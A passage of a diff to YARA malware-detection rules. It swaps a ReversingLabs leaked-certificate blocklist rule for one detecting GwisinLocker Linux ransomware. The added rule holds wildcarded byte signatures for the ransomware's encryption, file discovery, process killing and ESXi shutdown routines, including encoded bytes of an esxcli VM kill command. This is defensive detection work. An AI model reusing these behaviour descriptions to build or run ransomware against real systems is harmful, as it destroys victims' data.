?? ?? ?? ?? + EB ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 + ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ?? + ?? ?? 85 C0 74 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF + 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 + ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Root CA" and pe.signatures[i].serial=="46:9c:2c:af" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $enum_files_1 and $enum_files_2 and $crypto_file and $crypt_file and $remote_connection } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_469C3Cc9 : INFO FILE +rule REVERSINGLABS_Linux_Ransomware_Gwisinlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects GwisinLocker ransomware." author = "ReversingLabs" - id = "36d76a9f-d18f-56bf-b00a-f7320f04f39a" - date = "2023-11-08" - modified = "2023-11-08" + id = "9f00e1b4-3692-5824-b614-724073532c1f" + date = "2022-10-11" + modified = "2022-10-11" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L909-L925" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7327b7cbeb616bc46c82975aed6b3ea1caafa74fd431e2d98ca55b00851e22c8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Linux.Ransomware.GwisinLocker.yara#L1-L354" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c23c0b73bbefbd644ffe1398e1f14eec3a89945cb3c3ccbc6f46c57046b53505" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GwisinLocker" + tc_detection_factor = 5 importance = 25 + strings: + $init_key_v1 = { + 55 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 74 24 ?? 56 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 31 FF 83 EC ?? 56 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 + F8 5B 5E 5F 5D C3 66 90 31 D2 31 C0 89 54 04 ?? 83 C0 ?? 83 F8 ?? 72 ?? 83 EC ?? 8D + 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C5 8D 7C 24 ?? 85 + C0 74 ?? 50 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 89 2C 24 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? + 6A ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? 83 EC ?? 8D 44 + 24 ?? 50 FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? FF B3 + ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 56 FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 + 0F 94 C0 0F B6 C0 89 C7 E9 + } + $encrypt_files_v1_p1 = { + 55 B9 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8B 84 + 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 83 EC ?? 89 44 24 ?? 89 + C7 31 C0 F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 89 44 + 24 ?? 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? 31 FF 83 EC ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 + ?? ?? ?? ?? 58 5A 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 59 5E 6A ?? FF 74 24 ?? E8 ?? ?? + ?? ?? 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 83 EC ?? 6A ?? 8D 84 24 + ?? ?? ?? ?? 89 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 89 74 24 ?? + 85 C0 74 ?? 83 EC ?? 6A ?? FF 74 24 ?? 56 E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 59 5E 50 + 89 C5 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F 84 ?? + ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 89 C7 FF B4 24 ?? + ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 01 FA 89 D0 8B 54 + 24 ?? 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? 8B 94 24 ?? ?? ?? ?? + C6 44 3A ?? ?? BF ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? + ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 39 C1 B9 ?? ?? ?? ?? 19 D1 7D ?? 83 EC ?? FF B4 24 + ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? FF 74 + 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 83 EC ?? 56 E8 ?? ?? ?? + ?? 58 5A 55 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F + } + $encrypt_files_v1_p2 = { + 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 8B 74 24 + ?? 8B 7C 24 ?? 89 D1 89 74 24 ?? 89 7C 24 ?? 83 C4 ?? 39 F0 19 F9 7D ?? 89 44 24 ?? + 89 54 24 ?? 8B 7C 24 ?? 8B 74 24 ?? 89 F9 89 F5 C1 F9 ?? 89 C8 89 4C 24 ?? 31 CD 8B + 74 24 ?? C1 F8 ?? 89 44 24 ?? 89 E8 29 F0 8B 74 24 ?? 89 C7 83 E7 ?? 31 CF 89 F8 8B + 7C 24 ?? 29 F0 8B 74 24 ?? 89 FA 19 FA 8B 7C 24 ?? 29 C6 89 74 24 ?? 19 D7 83 EC ?? + 89 7C 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? + B9 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 31 C0 F3 AB 89 94 24 ?? ?? ?? ?? 56 6A ?? FF 74 + 24 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 83 + EC ?? FF 74 24 ?? E8 ?? ?? ?? ?? 5F 5D FF B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 + ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 8B 54 24 ?? 31 FF 8B 44 24 ?? + 89 7C 24 ?? 89 74 24 ?? 8D 74 24 ?? 89 D7 89 74 24 ?? 8D B3 ?? ?? ?? ?? 09 C7 89 74 + } + $encrypt_files_v1_p3 = { + 24 ?? 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 89 4C 24 ?? EB ?? 66 90 83 EC ?? 31 + ED FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF 74 24 ?? FF 74 + 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 31 D2 6A ?? 8B 84 24 ?? ?? ?? ?? 52 F7 D8 + 50 57 E8 ?? ?? ?? ?? 57 FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 44 24 ?? 8B BC 24 ?? ?? ?? ?? 8B 54 24 ?? 29 F8 19 EA 89 44 24 ?? 89 D6 89 54 + 24 ?? 83 C4 ?? 09 C6 74 ?? 39 84 24 ?? ?? ?? ?? 89 E9 8B 7C 24 ?? 19 D1 0F 4C 84 24 + ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? + ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 57 + FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 84 24 ?? + ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 EC ?? BF ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 + ?? E9 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? E9 + } + $find_files_v1_p1 = { + 55 89 C5 57 E8 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 54 24 ?? 8B + B4 24 ?? ?? ?? ?? 89 7C 24 ?? 89 FB 89 4C 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 85 C0 74 ?? 8D 58 ?? 80 7C 05 ?? ?? 0F 45 D8 89 5C 24 ?? + 8B BC 24 ?? ?? ?? ?? 83 E7 ?? 74 ?? 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B + 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 + ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D + B4 26 ?? ?? ?? ?? 66 90 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B 5C 24 ?? E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 78 ?? 8B 84 24 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C6 44 24 ?? ?? 31 FF C7 44 24 ?? + ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? F6 84 24 ?? ?? ?? ?? ?? 74 ?? 85 F6 0F 84 ?? ?? + ?? ?? 8B 4E ?? 8B 5E ?? 31 D1 31 C3 09 CB 0F 84 ?? ?? ?? ?? 31 FF 81 C4 ?? ?? ?? ?? + 89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 8B 5C 24 ?? E8 ?? ?? ?? ?? 89 C7 8B 00 83 F8 ?? + 0F 85 ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 55 6A ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? + ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 46 ?? 8B 4C 24 + ?? 83 C0 ?? 83 C1 ?? 89 44 24 ?? 89 44 24 ?? 8B 46 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 + } + $find_files_v1_p2 = { + 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B + 84 24 ?? ?? ?? ?? 83 E0 ?? 89 44 24 ?? 75 ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? + 55 8B 44 24 ?? FF D0 89 C7 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 74 ?? 8B 84 24 ?? + ?? ?? ?? 8B 5C 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 8B BC 24 ?? ?? ?? ?? 89 C5 EB ?? 8D B6 + ?? ?? ?? ?? 8B 36 85 F6 74 ?? 8B 46 ?? 8B 56 ?? 31 D8 31 CA 09 C2 75 ?? 8B 46 ?? 8B + 56 ?? 31 E8 31 FA 09 C2 0F 84 ?? ?? ?? ?? 8B 36 85 F6 75 ?? 8B 6C 24 ?? 8B 7C 24 ?? + 85 FF 74 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? C6 44 05 ?? ?? 8B 44 24 ?? + 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? 55 8B 44 24 ?? FF D0 + 83 C4 ?? 89 C7 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 66 90 83 EC ?? 6A ?? 55 8B 5C + 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8B 00 89 44 24 ?? + 83 C4 ?? 85 FF 79 ?? 83 F8 ?? 0F B6 4C 24 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ?? + ?? ?? 0F 44 44 24 ?? 0F 45 CA 89 44 24 ?? 88 4C 24 ?? 8B 44 24 ?? 85 C0 0F 85 ?? ?? + ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D B4 + 26 ?? ?? ?? ?? 8D 76 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 48 ?? 89 4C 24 ?? 89 4C 24 ?? 85 C0 74 ?? 80 7C 05 + ?? ?? 74 ?? E9 ?? ?? ?? ?? 8D 76 ?? 80 7C 05 ?? ?? 0F 85 ?? ?? ?? ?? 83 E8 ?? 75 ?? + 31 D2 89 54 24 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 + } + $find_files_v1_p3 = { + 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? E9 ?? ?? ?? ?? 90 + 8B 84 24 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? 83 E0 ?? 83 F8 ?? 19 C0 83 E0 ?? + 83 C0 ?? 89 44 24 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 90 8B 74 24 ?? 85 F6 0F 88 + ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F + 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 44 24 ?? 89 44 24 ?? 8D B4 26 ?? ?? ?? ?? 8D 76 ?? + 83 EC ?? 56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 78 ?? ?? + 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 78 ?? 57 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B 44 24 + ?? 0F 83 ?? ?? ?? ?? 8B 44 24 ?? 83 EC ?? C6 44 05 ?? ?? 57 8B 44 24 ?? 01 E8 50 8B + 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 5A 5B 8D 48 ?? 8D 44 24 ?? 50 89 E8 FF B4 24 ?? + ?? ?? ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 89 C7 + 56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 0F 84 ?? ?? + ?? ?? 66 83 78 ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 80 7C 05 ?? + ?? 8D 48 ?? 89 C2 0F 84 ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 80 7C 05 ?? ?? 8D 50 ?? + 75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 66 90 89 C2 85 D2 0F 84 ?? ?? ?? ?? 80 7C + 15 ?? ?? 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? + 31 FF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC ?? 56 8B 5C 24 ?? + E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 FB BF ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 00 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? + ?? ?? ?? BF + } + $kill_processes_v1_p1 = { + 55 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 E9 56 53 E8 ?? ?? ?? ?? 81 C3 + ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 66 89 54 24 ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 + ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? + C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 8B 83 ?? ?? ?? ?? + 89 44 24 ?? 8B 83 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? F3 A5 8D B4 24 ?? ?? ?? ?? C6 44 + } + $kill_processes_v1_p2 = { + 24 ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 F7 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 CD C7 44 24 ?? ?? ?? + ?? ?? B9 ?? ?? ?? ?? 89 E8 F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? + ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? + ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 + B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 + 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 + 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? + ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 89 34 + 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D + 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? + F3 AB FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? + 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 + } + $shut_down_esxi_v1 = { + 55 B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 C1 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 + EC ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? 65 73 78 63 C7 44 24 ?? 6C 69 20 76 C7 44 24 + ?? 6D 20 70 72 8D B3 ?? ?? ?? ?? C7 44 24 ?? 6F 63 65 73 F3 A5 8D B4 24 ?? ?? ?? ?? + C7 44 24 ?? 73 20 6B 69 83 EC ?? 89 F7 C7 44 24 ?? 6C 6C 20 2D C7 44 24 ?? 2D 74 79 + 70 C7 44 24 ?? 65 3D 66 6F C7 44 24 ?? 72 63 65 20 C7 44 24 ?? 2D 2D 77 6F 89 C8 B9 + ?? ?? ?? ?? C7 44 24 ?? 72 6C 64 2D C7 44 24 ?? 69 64 3D 22 C7 84 24 ?? ?? ?? ?? 25 + 73 22 00 C7 44 24 ?? 5B 45 53 58 C7 44 24 ?? 69 5D 20 53 C7 44 24 ?? 68 75 74 74 C7 + 44 24 ?? 69 6E 67 20 C7 44 24 ?? 64 6F 77 6E F3 AB C7 44 24 ?? 20 2D 20 25 8D 83 ?? + ?? ?? ?? 66 89 6C 24 ?? C6 44 24 ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 89 C5 8D 44 24 ?? 66 89 7C 24 ?? 31 FF + } + $kill_processes_v2_p1 = { + 41 54 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 E4 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 55 48 89 + FD 53 48 81 EC ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 48 89 84 24 ?? ?? ?? ?? B8 ?? ?? + ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F + 6F 05 ?? ?? 00 00 48 89 DF 66 89 44 24 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 44 24 + ?? 66 0F 6F 05 ?? ?? 00 00 66 89 54 24 ?? 48 89 EA 0F 29 44 24 ?? 66 0F 6F 05 ?? ?? + 00 00 66 89 8C 24 ?? ?? 00 00 B9 ?? ?? ?? ?? 0F 29 44 24 ?? 66 0F 6F 05 ?? ?? 00 00 + C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6 + 84 24 ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C7 44 24 ?? ?? + ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6 44 24 ?? ?? 0F 29 84 24 + ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ?? + ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 B8 + } + $kill_processes_v2_p2 = { + 48 89 44 24 ?? 4C 89 E0 F3 48 AB 48 89 DF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? + ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? + ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 + ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D + 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF + B9 ?? ?? ?? ?? F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 + 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 + EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? + F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 + 81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3 + } + $encrypt_files_v2_p1 = { + 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 41 57 66 0F EF C0 49 89 FF 41 56 49 89 D6 41 55 49 89 + F5 BE ?? ?? ?? ?? 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 4C 24 ?? 48 + 8D AC 24 ?? ?? ?? ?? 48 89 DF 4C 89 04 24 0F 29 44 24 ?? 0F 29 44 24 ?? 0F 29 44 24 + ?? 48 C7 44 24 ?? ?? ?? ?? ?? 0F 29 44 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75 + ?? 45 31 E4 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF BE ?? ?? ?? ?? E8 ?? ?? + ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 44 89 E0 5B 5D + 41 5C 41 5D 41 5E 41 5F C3 0F 1F 80 ?? ?? ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ?? + ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? + ?? 4C 89 FF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 89 FF E8 ?? + ?? ?? ?? 4C 89 FE 4C 89 EF 48 89 C2 49 89 C4 E8 ?? ?? ?? ?? 8B 54 24 ?? 4B 8D 44 25 + ?? 31 F6 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? BA ?? ?? ?? ?? 43 + C6 44 25 ?? ?? 4C 8B 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 45 31 + E4 E8 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 + 8B 7C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 0F 